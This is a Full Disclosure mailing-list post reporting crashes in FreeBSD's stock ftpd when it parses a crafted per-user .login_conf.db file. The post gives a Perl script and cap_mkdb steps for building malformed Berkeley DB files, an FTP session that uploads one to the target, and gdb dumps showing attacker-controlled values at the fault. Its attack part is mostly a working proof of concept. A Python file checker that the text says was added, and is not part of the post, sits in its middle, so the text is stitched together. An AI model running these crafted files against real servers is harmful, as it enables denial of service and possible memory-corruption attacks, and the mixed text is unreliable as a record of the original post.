Full Disclosure mailing list archives

FreeBSD stock ftpd vulnerabilities (and more)


From: "HI-TECH ." <isowarez.isowarez.isowarez () googlemail com>
Date: Tue, 10 Aug 2010 04:11:46 +0200

FreeBSD stock ftpd vulnerabilities (and more)

Currently this is crash only.

Also see the attachment.

More at @ http://isowarez.de/ lewls

Cheers /Kingcope

.login_conf.db vulnerabilities (FreeBSD Berkeley DB 1.85)
affects stock ftpd, openssh, /usr/bin/login
-----------------------------------------------------------

perl program to create the .db files and play with:

#!/usr/bin/perl
# Creates test.db, a Berkeley DB 1.85 hash file, holding one oversized value
use strict;
use warnings;
use Fcntl;      # O_CREAT, O_TRUNC, O_RDWR
use DB_File;    # $DB_HASH and the tie interface to db(3)

my %hash;
# 0666 is the default file creation mode (DEFFILEMODE on BSD)
my $db = tie %hash, 'DB_File', "test.db", O_CREAT | O_TRUNC | O_RDWR,
    0666, $DB_HASH or die "tie test.db: $!";

# a value larger than one page (default 4096 bytes) is stored as a big pair
my $value = "A" x 10100;

$db->put("test", $value);
$db->sync();
$db->fd();      # returns the underlying file descriptor (not otherwise needed)
undef $db;      # drop the object reference before untie
untie %hash;
------------------------------------------------------------------------------------------------------------------

one db file was created using OpenBSD like so:
perl -e 'print "me:\\\n:" . "A" x 100000 . "=" . "A:"' > .login_conf
then using vi put a tab before the :AAAA...A's after the me:\n
then do:
cap_mkdb .login_conf

you cannot use FreeBSD's cap_mkdb because it has a strcpy buffer overflow
when parsing this file, OpenBSD does not :>

------------------------------------------------------------------------------------------------------------------

%uname -a;
FreeBSD r00tbox0wned.Belkin 6.3-RELEASE FreeBSD 6.3-RELEASE #0: Wed Jan 16 04:18:52 UTC 2008     root () dessler cse buffalo edu:/usr/obj/usr/src/sys/GENERIC  i386

.login_conf_suspect.db


C:\Users\Niko>ftp 192.168.2.19
Connected to 192.168.2.19.
220 r00tbox0wned.Belkin FTP server (Version 6.00LS) ready.
User (192.168.2.19:(none)): kcope
331 Password required for kcope.
Password:
230 User kcope logged in.
ftp> bin
200 Type set to I.
ftp> put Desktop/.login_conf_suspect.db .login_conf.db
200 PORT command successful.
150 Opening BINARY mode data connection for '.login_conf.db'.
226 Transfer complete.
ftp: 180224 bytes sent in 0,04Seconds 4870,92Kbytes/sec.
ftp> quit
221 Goodbye.

C:\Users\Niko>ftp 192.168.2.19
Connected to 192.168.2.19.
220 r00tbox0wned.Belkin FTP server (Version 6.00LS) ready.
User (192.168.2.19:(none)): kcope
331 Password required for kcope.
Password:
Connection closed by remote host.

C:\Users\Niko>ftp 192.168.2.19
Connected to 192.168.2.19.
220 r00tbox0wned.Belkin FTP server (Version 6.00LS) ready.
User (192.168.2.19:(none)): kcope
331 Password required for kcope.
Password:

%gdb /usr/libexec/ftpd
GNU gdb 6.1.1 [FreeBSD]
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-marcel-freebsd"...
(gdb) attach 668
Attaching to program: /usr/libexec/ftpd, process 668
Reading symbols from /lib/libutil.so.5...done.
Loaded symbols for /lib/libutil.so.5
Reading symbols from /lib/libcrypt.so.3...done.
Loaded symbols for /lib/libcrypt.so.3
Reading symbols from /usr/lib/libopie.so.4...done.
Loaded symbols for /usr/lib/libopie.so.4
Reading symbols from /lib/libmd.so.3...done.
Loaded symbols for /lib/libmd.so.3
Reading symbols from /lib/libm.so.4...done.
Loaded symbols for /lib/libm.so.4
Reading symbols from /usr/lib/libpam.so.3...done.
Loaded symbols for /usr/lib/libpam.so.3
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /libexec/ld-elf.so.1...done.
Loaded symbols for /libexec/ld-elf.so.1
0x281a4b1d in read () at read.S:2
2       RSYSCALL(read)
Current language:  auto; currently asm
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x28192463 in collect_data (hashp=0x8061400, bufp=0x805f400, len=44900, set=0)
    at /var/src/lib/libc/db/hash/hash_bigkey.c:492
492                     xbp = __get_buf(hashp, bp[bp[0] - 1], bufp, 0);
Current language:  auto; currently c
(gdb) i r
eax            0xffff   65535                < OUR VALUE
ecx            0x0      0
edx            0xffff1001       -61439
ebx            0x281b4960       672876896
esp            0xbfbfc228       0xbfbfc228
ebp            0xbfbfc258       0xbfbfc258
esi            0x8061400        134616064
edi            0x8088000        134774784
eip            0x28192463       0x28192463
eflags         0x10286  66182
cs             0x33     51
ss             0x3b     59
ds             0x3b     59
es             0x3b     59
fs             0x3b     59
gs             0x1b     27
(gdb)
(gdb) x/10i $eip
0x28192463 <collect_data+71>:   movzwl 0xfffffffe(%edi,%eax,2),%eax
0x28192468 <collect_data+76>:   push   %eax
0x28192469 <collect_data+77>:   push   %esi
0x2819246a <collect_data+78>:   call   0x2810007c <_init+148>
0x2819246f <collect_data+83>:   add    $0x10,%esp
0x28192472 <collect_data+86>:   test   %eax,%eax
0x28192474 <collect_data+88>:   mov    %eax,%edx
0x28192476 <collect_data+90>:   je     0x28192594 <collect_data+376>
0x2819247c <collect_data+96>:   sub    $0x8,%esp
0x2819247f <collect_data+99>:   pushl  0xc(%ebp)
(gdb)
(gdb) i f
Stack level 0, frame at 0xbfbfc260:
 eip = 0x28192463 in collect_data
    (/var/src/lib/libc/db/hash/hash_bigkey.c:492); saved eip 0x28192490
 called by frame at 0xbfbfc2a0
 source language c.
 Arglist at 0xbfbfc258, args: hashp=0x8061400, bufp=0x805f400, len=44900, set=0
 Locals at 0xbfbfc258, Previous frame's sp is 0xbfbfc260
 Saved registers:
  ebx at 0xbfbfc24c, ebp at 0xbfbfc258, esi at 0xbfbfc250, edi at 0xbfbfc254,
  eip at 0xbfbfc25c
(gdb)
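The crash above faults on bp[bp[0] - 1] with bp[0] = 0xffff, an entry count read straight from the uploaded .db file. The following Python is an added example, not part of the original post or FreeBSD: it parses the Berkeley DB 1.85 hash header (HASHHDR layout, magic 0x061561), sanity-checks it, and flags any page whose entry count could not fit in a page, which is the condition that drives collect_data() out of bounds. The sample file it builds is constructed inline and hypothetical.

```python
import struct

HASHMAGIC, HASHVERSION, NCACHED = 0x061561, 2, 32
# HASHHDR: 17 int32 fields, then spares[32] (int32) and bitmaps[32] (uint16)
HDR_FMT = "17i%di%dH" % (NCACHED, NCACHED)
HDR_LEN = struct.calcsize("<" + HDR_FMT)

def check_hashdb(data):
    """Return a list of findings for a db(3) hash file; [] means it looks sane."""
    if len(data) < HDR_LEN:
        return ["file shorter than the hash header"]
    for endian in ("<", ">"):          # db(3) byte-swaps a foreign-order header
        f = struct.unpack(endian + HDR_FMT, data[:HDR_LEN])
        if f[0] == HASHMAGIC:
            break
    else:
        return ["bad magic: not a Berkeley DB 1.85 hash file"]
    version, bsize, hdrpages = f[1], f[3], f[15]
    findings = []
    if version != HASHVERSION:
        findings.append("unexpected header version %d" % version)
    if bsize < 512 or bsize > 65536 or bsize & (bsize - 1):
        return findings + ["implausible bucket size %d" % bsize]
    if len(data) % bsize:
        findings.append("size %d is not a multiple of bsize %d" % (len(data), bsize))
    npages = len(data) // bsize
    if hdrpages < 1 or hdrpages > npages:
        return findings + ["hdrpages %d out of range for %d pages" % (hdrpages, npages)]
    # A data page starts with bp[0] = number of 16-bit offset slots, followed by
    # the slots, the free-space offset and the free-space count (n + 3 words).
    # collect_data() reads bp[bp[0] - 1] without a bounds check, so a count that
    # cannot fit in one page is the condition behind the crash above.
    max_entries = bsize // 2 - 3
    for pg in range(hdrpages, npages):
        n = struct.unpack_from(endian + "H", data, pg * bsize)[0]
        if n > max_entries:
            findings.append("page %d: entry count %d exceeds capacity %d" % (pg, n, max_entries))
    return findings

def sample_db(entry_count):
    """Constructed little-endian 3-page file (hypothetical sample, not from the
    post): header page, an empty bucket page, a page with the given bp[0]."""
    bsize = 4096
    hdr = [HASHMAGIC, HASHVERSION, 1234, bsize, 12, 256, 256, 8, 0, 0,
           0, 1, 0, 65536, 0, 1, 0] + [0] * NCACHED + [0] * NCACHED
    page0 = struct.pack("<" + HDR_FMT, *hdr).ljust(bsize, b"\0")
    page1 = struct.pack("<3H", 0, bsize - 1, bsize - 6).ljust(bsize, b"\0")  # n=0
    page2 = struct.pack("<H", entry_count).ljust(bsize, b"\0")
    return page0 + page1 + page2
```

Run check_hashdb() over a user's ~/.login_conf.db before the login path parses it; a non-empty result means the file should not be trusted.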

---------------------------------------------------------------------------------------

__getbuf_crash_suspicious.db


%gdb /usr/libexec/ftpd
GNU gdb 6.1.1 [FreeBSD]
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-marcel-freebsd"...
(gdb) attach 680
Attaching to program: /usr/libexec/ftpd, process 680
Reading symbols from /lib/libutil.so.5...done.
Loaded symbols for /lib/libutil.so.5
Reading symbols from /lib/libcrypt.so.3...done.
Loaded symbols for /lib/libcrypt.so.3
Reading symbols from /usr/lib/libopie.so.4...done.
Loaded symbols for /usr/lib/libopie.so.4
Reading symbols from /lib/libmd.so.3...done.
Loaded symbols for /lib/libmd.so.3
Reading symbols from /lib/libm.so.4...done.
Loaded symbols for /lib/libm.so.4
Reading symbols from /usr/lib/libpam.so.3...done.
Loaded symbols for /usr/lib/libpam.so.3
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /libexec/ld-elf.so.1...done.
Loaded symbols for /libexec/ld-elf.so.1
0x281a4b1d in read () at read.S:2
2       RSYSCALL(read)
Current language:  auto; currently asm
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
memcpy () at /var/src/lib/libc/i386/string/bcopy.S:79
79              rep
(gdb)
Program received signal SIGSEGV, Segmentation fault.
memcpy () at /var/src/lib/libc/i386/string/bcopy.S:79
79              rep
(gdb) i r
eax            0x5ff82  393090
ecx            0x3      3
edx            0x3      3
ebx            0x281b4960       672876896
esp            0xbfbfc544       0xbfbfc544
ebp            0xbfbfc578       0xbfbfc578
esi            0x28096348       671703880
edi            0x5ff82  393090
eip            0x281a436d       0x281a436d
eflags         0x10206  66054
cs             0x33     51
ss             0x3b     59
ds             0x3b     59
es             0x3b     59
fs             0x3b     59
gs             0x1b     27
(gdb)
(gdb) i f
Stack level 0, frame at 0xbfbfc550:
 eip = 0x281a436d in memcpy (/var/src/lib/libc/i386/string/bcopy.S:79); saved eip 0x281869fe
 called by frame at 0xbfbfc580
 source language asm.
 Arglist at 0xbfbfc548, args:
 Locals at 0xbfbfc548, Previous frame's sp is 0xbfbfc550
 Saved registers:
  esi at 0xbfbfc544, edi at 0xbfbfc540, eip at 0xbfbfc54c
(gdb)
(gdb) x/10i $eip
0x281a436d <memcpy+37>: repz movsb %ds:(%esi),%es:(%edi)
0x281a436f <memcpy+39>: pop    %edi
0x281a4370 <memcpy+40>: pop    %esi
0x281a4371 <memcpy+41>: ret
0x281a4372 <memcpy+42>: add    %ecx,%edi
0x281a4374 <memcpy+44>: add    %ecx,%esi
0x281a4376 <memcpy+46>: std
0x281a4377 <memcpy+47>: mov    %ecx,%edx
0x281a4379 <memcpy+49>: and    $0x3,%ecx
0x281a437c <memcpy+52>: dec    %edi
(gdb)
---------------------------------------------------------------------------------------

cgetent_crash_suspicious.db

looks like this is outside of the Berkeley DB 1.85 code.

localhost# uname -a;
FreeBSD localhost.Belkin 4.9-RELEASE FreeBSD 4.9-RELEASE #0: Mon Oct 27 17:51:09 GMT 2003     root () freebsd-stable sentex ca:/usr/obj/usr/src/sys/GENERIC  i386

doesn't work on 6.3

localhost# ps aux | grep ftpd
root    161  0.0  0.3  1016  344  p0  R+    9:04PM   0:00.01 grep ftpd
root    150  0.0  0.9  1420 1088  ??  Is    9:03PM   0:00.02 ftpd: 192.168.2.15
localhost# gdb /usr/libexec/ftpd
GNU gdb 4.18 (FreeBSD)
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd"...
(no debugging symbols found)...
(gdb) attach 150
Attaching to program: /usr/libexec/ftpd, process 150
Reading symbols from /usr/lib/libskey.so.2...(no debugging symbols found)...done.
Reading symbols from /usr/lib/libmd.so.2...(no debugging symbols found)...done.
Reading symbols from /usr/lib/libcrypt.so.2...(no debugging symbols found)...done.
Reading symbols from /usr/lib/libutil.so.3...(no debugging symbols found)...done.
Reading symbols from /usr/lib/libm.so.2...(no debugging symbols found)...done.
Reading symbols from /usr/lib/libpam.so.1...(no debugging symbols found)...done.
Reading symbols from /usr/lib/libc.so.4...(no debugging symbols found)...done.
Reading symbols from /usr/libexec/ld-elf.so.1...(no debugging symbols found)...done.
0x28146c44 in read () from /usr/lib/libc.so.4
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x2810da81 in cgetent () from /usr/lib/libc.so.4
(gdb) i r
eax            0x0      0
ecx            0xfffffff3       -13
edx            0x807cff4        134729716
ebx            0x281522ec       672473836
esp            0xbfbfdf08       0xbfbfdf08
ebp            0xbfbfe480       0xbfbfe480
esi            0xbfbfe380       -1077943424
edi            0x807d000        134729728
eip            0x2810da81       0x2810da81
eflags         0x10246  66118
cs             0x1f     31
ss             0x2f     47
ds             0x2f     47
es             0x2f     47
fs             0x2f     47
gs             0x2f     47
(gdb) x/10i $eip
0x2810da81 <cgetent+513>:       repnz scas %es:(%edi),%al
0x2810da83 <cgetent+515>:       mov    %ecx,%esi
0x2810da85 <cgetent+517>:       not    %esi
0x2810da87 <cgetent+519>:       lea    0xffffffff(%esi),%edx
0x2810da8a <cgetent+522>:       mov    %edx,0xfffffad4(%ebp)
0x2810da90 <cgetent+528>:       add    $0xfffffff4,%esp
0x2810da93 <cgetent+531>:       push   %esi
0x2810da94 <cgetent+532>:       call   0x280dd8a4 <_init+2316>
0x2810da99 <cgetent+537>:       mov    %eax,%edi
0x2810da9b <cgetent+539>:       add    $0xfffffffc,%esp
(gdb)
(gdb) i f
Stack level 0, frame at 0xbfbfe480:
 eip = 0x2810da81 in cgetent; saved eip 0x2810d8ae
 called by frame at 0xbfbfe4c0
 Arglist at 0xbfbfe480, args:
 Locals at 0xbfbfe480, Previous frame's sp is 0x0
 Saved registers:
  ebx at 0xbfbfe468, ebp at 0xbfbfe480, eip at 0xbfbfe484
(gdb)

I am sure there are more places where it might crash. Just modify the values of the .db files in a hex editor and check it out.

Attachment: FreeBSD.zip
